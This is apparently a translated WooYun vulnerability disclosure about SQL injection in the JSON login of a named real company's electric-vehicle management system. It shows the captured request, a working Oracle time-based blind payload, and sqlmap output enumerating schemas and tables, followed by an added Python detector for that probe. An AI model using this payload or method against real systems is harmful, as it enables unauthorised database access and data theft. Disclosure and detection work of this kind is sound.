WooYun (WooYun.org) historical vulnerability search --- http://wy.zone.ci/
WooYun Drops articles online browsing -------- http://drop.zone.ci/
2015-11-27: Details have been sent to the vendor and are awaiting processing
2015-11-27: Vendor has confirmed; details disclosed to the vendor only
2015-12-07: Details disclosed to core white hats and experts in the relevant field
2015-12-17: Details disclosed to regular white hats
2015-12-27: Details disclosed to intern white hats
2016-01-11: Details disclosed to the public
As titled: a large amount of database information.
0x01 Vulnerability location
eip.zznissan.com.cn:2051
Still the electric-vehicle management system. Earlier I only tried weak passwords, so let's test it more deeply.
0x02 Vulnerability type
SQL injection --- at the login
0x03 Vulnerability details
At the login:
Captured the POST packet and found that the request data is JSON; that is the way in ~~~
POST /Data/UserManagement.svc/LoginForWebUser HTTP/1.1
Host: eip.zznissan.com.cn:2051
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/json; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://eip.zznissan.com.cn:2051/indexLogin.htm
Content-Length: 35
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

{"UserName":"aaa","Password":"aaa"}
0x04 Exploitation
Testing with sqlmap is enough.
0x05 Proof of results
And so a large amount of data was found. Injection information:
sqlmap identified the following injection points with a total of 101 HTTP(s) requests:
---
Place: (custom) POST
Parameter: JSON #1*
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: {"UserName":"aaa' AND 7527=DBMS_PIPE.RECEIVE_MESSAGE(CHR(107)||CHR(104)||CHR(117)||CHR(112),5) AND 'pfws'='pfws","Password":"aaa"}
---
[13:46:38] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
back-end DBMS: Oracle
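As an added defensive example (not part of the original report), the following Python scans JSON login-request records for the signature of the time-based blind probe shown above: an Oracle delay primitive inside a JSON string value, sqlmap's quoted boolean tail, and a response that actually stalled. The log records, field names and the 5-second threshold are constructed assumptions.

```python
import json
import re

LOGIN_PATH = "/Data/UserManagement.svc/LoginForWebUser"  # endpoint from the report

# DBMS_PIPE.RECEIVE_MESSAGE is the delay primitive in the report's payload;
# DBMS_LOCK.SLEEP is the other common Oracle time-based blind primitive.
ORACLE_DELAY_RE = re.compile(
    r"DBMS_PIPE\.RECEIVE_MESSAGE\s*\(|DBMS_LOCK\.SLEEP\s*\(", re.IGNORECASE)
# sqlmap's closing tail (... AND 'pfws'='pfws) ends the value on an unclosed
# quote that the application's own SQL string is expected to close.
BOOL_TAIL_RE = re.compile(r"\b(AND|OR)\s+'[^']*'\s*=\s*'[^']*$", re.IGNORECASE)

# Constructed request records (not captured traffic): a normal login, a probe
# modelled on the report's payload, and a legitimate name with an apostrophe.
SAMPLE_REQUESTS = [
    {"path": LOGIN_PATH, "rt_ms": 120,
     "body": json.dumps({"UserName": "aaa", "Password": "aaa"})},
    {"path": LOGIN_PATH, "rt_ms": 5130, "body": json.dumps({
        "UserName": "aaa' AND 7527=DBMS_PIPE.RECEIVE_MESSAGE(CHR(107)||CHR(104),5)"
                    " AND 'pfws'='pfws",
        "Password": "aaa"})},
    {"path": LOGIN_PATH, "rt_ms": 95,
     "body": json.dumps({"UserName": "o'brien", "Password": "x"})},
]

def _string_values(obj):
    """Yield every string leaf of a parsed JSON document, however nested."""
    if isinstance(obj, str):
        yield obj
    elif isinstance(obj, (dict, list)):
        for v in (obj.values() if isinstance(obj, dict) else obj):
            yield from _string_values(v)

def scan_request(rec, slow_ms=5000):
    """Return finding tags for one record; an empty list means nothing suspicious."""
    try:
        body = json.loads(rec["body"])
    except (KeyError, ValueError):
        return ["unparseable-json-body"]
    tags = []
    for value in _string_values(body):
        if ORACLE_DELAY_RE.search(value):
            tags.append("oracle-time-delay-function")
        if BOOL_TAIL_RE.search(value):
            tags.append("quoted-boolean-tail")
    # Delay primitive plus a stalled response = successful probe, not just an attempt.
    if "oracle-time-delay-function" in tags and rec.get("rt_ms", 0) >= slow_ms:
        tags.append("delay-observed")
    return tags
```

Feeding real access-log records through scan_request and alerting on any non-empty tag list flags both the sqlmap run and the original hand-crafted probe; a plain apostrophe in a name does not trigger it.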
Database information
available databases [24]:
[*] "IX\X02"
[*] "OWBSYS!"
[*] APEX_030200
[*] APPQOSSYS
[*] CTXSYS
[*] DBSNMP
[*] EXFSYS
[*] FLOWS_FILES
[*] HR
[*] MDSYS
[*] OE
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTMN
[*] PM
[*] RICHAN
[*] SCOTT
[*] SH
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] WMSYS
[*] XDB
Fetching table data is straightforward from here; I won't go any deeper.
[15:38:08] [INFO] fetching database (schema) names
[15:38:08] [INFO] fetching number of databases
[15:38:08] [INFO] resumed: 24
[15:38:08] [INFO] resumed: APEX_030200
[15:38:08] [INFO] resumed: APPQOSSYS
[15:38:08] [INFO] resumed: CTXSYS
[15:38:08] [INFO] resumed: DBSNMP
[15:38:08] [INFO] resumed: EXFSYS
[15:38:08] [INFO] resumed: FLOWS_FILES
[15:38:08] [INFO] resumed: HR
[15:38:08] [INFO] resumed: IX\x02
[15:38:08] [INFO] resumed: MDSYS
[15:38:08] [INFO] resumed: OE
[15:38:08] [INFO] resumed: OLAPSYS
[15:38:08] [INFO] resumed: ORDDATA
[15:38:08] [INFO] resumed: ORDSYS
[15:38:08] [INFO] resumed: OUTMN
[15:38:08] [INFO] resumed: OWBSYS!
[15:38:08] [INFO] resumed: PM
[15:38:08] [INFO] resumed: RICHAN
[15:38:08] [INFO] resumed: SCOTT
[15:38:08] [INFO] resumed: SH
[15:38:08] [INFO] resumed: SYS
[15:38:08] [INFO] resumed: SYSMAN
[15:38:08] [INFO] resumed: SYSTEM
[15:38:08] [INFO] resumed: WMSYS
[15:38:08] [INFO] resumed: XDB
[15:38:08] [INFO] fetching tables for databases: 'IX, OWBSYS!, APEX_030200, APPQOSSYS, CTXSYS, DBSNMP, EXFSYS, FLOWS_FILES, HR, MDSYS, OE, OLAPSYS, ORDDATA, ORDSYS, OUTMN, PM, RICHAN, SCOTT, SH, SYS, SYSMAN, SYSTEM, WMSYS, XDB'
[15:38:08] [INFO] fetching number of tables for database 'ORDSYS'
[15:38:08] [INFO] resumed: 5
[15:38:08] [INFO] resumed: SI_IMAGE_FORMATS_TAB
[15:38:08] [INFO] resumed: SI_FEATURES_TAB
[15:38:08] [INFO] resumed: SI_VALUES_TABA
[15:38:08] [INFO] resumed: ORD_USAGE_RECS
[15:38:08] [INFO] resumed: ORD_CARTRIDGE_COMPONENTS
[15:38:08] [INFO] fetching number of tables for database 'HR'
[15:38:08] [INFO] resumed: 7
[15:38:08] [INFO] resumed: REGIONS
[15:38:08] [INFO] resumed: LOCATIONS!
[15:38:08] [INFO] resumed: DEPARTMENTS
[15:38:08] [INFO] resumed: JOBS
[15:38:08] [INFO] resumed: EMPLOYEES
[15:38:08] [INFO] resumed: JOB_HISTORY
[15:38:08] [INFO] resumed: CQUNTRIES
[15:38:08] [INFO] fetching number of tables for database 'APEX_030200'
[15:38:08] [INFO] resumed: 360
[15:38:08] [INFO] resumed: WWV_FLOW_COMPANIES
[15:38:08] [INFO] resumed: WWV_FLOW_ACTIVITY_LOG_NUMBER%
[15:38:08] [INFO] resumed: WWV_FLOW_USER_ACCESS_LOG_NUM$
[15:38:08] [INFO] resumed: WWV_FLOW_DUAL100
Testing alone is enough; OK, done.
Leaving it to the vendor.
Severity: Medium
Vulnerability Rank: 10
Confirmed: 2015-11-27 15:57
A tragedy of weak passwords. The reporter was thorough. Thanks!
None yet